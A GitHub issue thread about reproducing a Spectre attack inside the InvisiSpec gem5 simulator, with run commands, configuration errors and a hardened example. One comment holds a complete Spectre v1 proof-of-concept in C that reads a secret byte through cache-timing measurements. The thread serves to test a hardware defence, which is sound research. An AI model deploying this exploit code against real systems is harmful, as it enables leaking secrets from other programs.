Comments (11)

mytbk commented on July 18, 2024 7

I'd like to see what changes the InvisiSpec code has done to gem5, but this repo doesn't have the history on what modification has been done, so I tried to rebase the code to a gem5 revision. It's a big change with nearly 3k lines of modifications.
https://git.wehack.space/gem5/commit/?h=invisispec-1.0&id=169588684b179baed4f5f93d8be52c51aa08f06d
I found the code has added the rdtscp in src/arch/x86/isa/insts/system/msrs.py and src/arch/x86/isa/macroop.isa.

from invisispec-1.0.

mytbk commented on July 18, 2024 4

I've just written PoC code which evicts everything in the cache, then uses Spectre to read the secret value in the cache. I also rebased the code to a gem5 revision which has an rdtscp implementation (https://git.wehack.space/gem5/log/?h=is-rebase-new3-rdtscp). My attack code is as follows:

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>

/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
#define LLC_SIZE (2 << 20)

uint8_t dummy[LLC_SIZE];
size_t array_size = 4;
uint8_t array1[200] = {1, 2, 3, 4};
uint8_t array2[256 * 64 * 2];
uint8_t X;

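/* bounds-checked read of array1; the result indexes one cache line of array2 */
uint8_t victim(size_t idx)
{
	if (idx < array_size) {
		return array2[array1[idx] * 64];
	}
	return 0; /* out-of-bounds call: no architectural access */
}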

int main()
{
	unsigned long t[256];
	volatile uint8_t x = 0;

	victim(0);
	victim(0);
	victim(0);
	victim(0);
	victim(0);

	memset(dummy, 1, sizeof(dummy)); // flush L2
	X = 123; // set the secret value, and also bring it to cache

	_mm_mfence();

	size_t attack_idx = &X - array1;
	victim(attack_idx);

	for (int i = 0; i < 256; i++) {
		unsigned int junk;
		unsigned long time1 = __rdtscp(&junk);
		x ^= array2[i * 64];
		unsigned long time2 = __rdtscp(&junk);
		t[i] = time2 - time1;
	}

	printf("attack_idx = %zu\n", attack_idx);
	for (int i = 0; i < 256; i++) {
		printf("%d: %lu, %s\n", i, t[i], (t[i] < 40) ? "hit" : "miss");
	}
}

When running
./build/X86_MESI_Two_Level/gem5.fast configs/example/se.py --num-cpus=1 --mem-size=4GB --cpu-type=DerivO3CPU --needsTSO=1 --scheme=UnsafeBaseline --ruby -c attack
I can see "123: 30, hit" and the others miss, while after changing UnsafeBaseline to SpectreSafeInvisibleSpec, all the lines miss.
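For comparison with the hardware defence exercised above, here is the software-side hardening of the same bounds-check pattern. It is an added example, not code from this thread or from the InvisiSpec project. The names index_mask_nospec and victim_masked are hypothetical, the masking idea follows the Linux kernel's array_index_nospec helper, and the empty asm statement assumes GCC or Clang.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define STRIDE 64                       /* one cache line per byte value */

static size_t  array_size = 4;          /* same layout as the PoC above */
static uint8_t array1[200] = {1, 2, 3, 4};
static uint8_t array2[256 * STRIDE];

/* Returns all-ones when idx < size and zero otherwise, using arithmetic
 * only, so the result does not depend on how the branch was predicted.
 * Exact for size <= SIZE_MAX / 2; larger sizes can only yield zero. */
static size_t index_mask_nospec(size_t idx, size_t size)
{
	/* GCC/Clang: hide idx from the optimizer so the mask is not folded
	 * to a constant once the compiler has seen the bounds check. */
	__asm__ volatile("" : "+r"(idx));
	size_t v = idx | (size - 1 - idx);  /* top bit set iff idx >= size */
	return (v >> (sizeof(size_t) * 8 - 1)) - 1;
}

/* Hardened form of victim(): an out-of-range idx is forced to 0 before it
 * is used as an address, even on a mispredicted path. */
uint8_t victim_masked(size_t idx)
{
	if (idx < array_size) {
		idx &= index_mask_nospec(idx, array_size);
		return array2[array1[idx] * STRIDE];
	}
	return 0;
}

int main(void)
{
	size_t probes[] = {0, 3, 4, 1000, (size_t)-5};   /* constructed inputs */
	for (size_t i = 0; i < sizeof(probes) / sizeof(probes[0]); i++) {
		size_t m = index_mask_nospec(probes[i], array_size);
		printf("idx=%zu mask=%#zx clamped=%zu\n",
		       probes[i], m, probes[i] & m);
	}
	return 0;
}
```

With the mask applied, a transient execution of the load can only touch array1[0], so the secret byte is never used to select a line of array2.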

mjyan0720 commented on July 18, 2024

The version of GEM5 that we started with does not have good support for serializing "rdtscp" instructions, resulting in incorrect measurement of execution time. After hacking the simulator, we made the attack work, but it is required to use 2 "rdtscp" instructions, where the first one works as a "fence" and the second one works as the real "rdtsc" instruction.

We just uploaded the attack code. Please find it under the directory "attack_code".

Also, InvisiSpec requires modifying the cache, and we only did it for MESI_Two_Level.

rodney2612 commented on July 18, 2024

Thank you so much for your response.

Using --caches with --scheme=SpectreSafeInvisibleSpec gives the below error:
gem5.opt: build/X86_MESI_Two_Level/mem/cache/cache.cc:192: void Cache::satisfyRequest(PacketPtr, CacheBlk*, bool, bool): Assertion `pkt->hasRespData()' failed.
Program aborted at tick 844000

So, I had to use --ruby (the example scripts use ruby too). I ran the below command:
build/X86_MESI_Two_Level/gem5.opt --outdir=m5out configs/example/se.py --cpu-type=DerivO3CPU --needsTSO=0 --scheme=UnsafeBaseline --ruby --l1d_assoc=8 --l2_assoc=16 --l1i_assoc=4 -c spectre_full
The Spectre attack is not working with the above command, where spectre_full is the binary for the attack code provided by you.

However, Spectre attack works when I run:
build/X86_MESI_Two_Level/gem5.opt configs/learning_gem5/part1/two_level.py spectre_full
two_level.py creates standard caches instead of ruby simulated caches.

So, could you please let me know how you ran the attack using --ruby? Could you please share the command/script used to run Spectre, if possible?

I have tried tweaking various config options as well as CACHE_HIT_THRESHOLD to run the attack with ruby, but without any success. Also, I have tried using most of the config options in run_spec_from_ckpt.sh without success.

mjyan0720 commented on July 18, 2024

For the first problem, the InvisiSpec mode only works under ruby mode. It is because we added new transactions, such as the invisible request, validation, exposure (details in the InvisiSpec paper). We only modified the ruby mode to handle these requests. This is why the classical cache mode does not work.

For the second problem, it is weird that the Spectre code does not work. We are looking into it, and hopefully can get back to you soon.

rodney2612 commented on July 18, 2024

Thanks for the quick reply.
Would significant changes to the existing code be required to get InvisiSpec mode to work in standard cache mode?

mjyan0720 commented on July 18, 2024

I think it requires some changes. Basically, you need to add support to handle these new requests.

rodney2612 commented on July 18, 2024

Could you please confirm this for me:
You ran the attack with scheme as UnsafeBaseline in cache mode and showed your defense against attack with scheme as SpectreSafeInvisibleSpec in Ruby mode. Am I missing something here?

mjyan0720 commented on July 18, 2024

rodney2612 commented on July 18, 2024

Request you to add the branch you used to test the attack code.

Gerrie-Cui commented on July 18, 2024

@mytbk Why is the delay 20 when I use the above code? Can you run the Spectre attack under the option of UnsafeBaseline? This code is a modification of the base mountain on InvisiSpec, but it can run a Spectre attack in the case of UnsafeBaseline: https://github.com/gururaj-s/cleanupspec. In this code, clflush and rdtscp seem to work. But there is an error under other options.
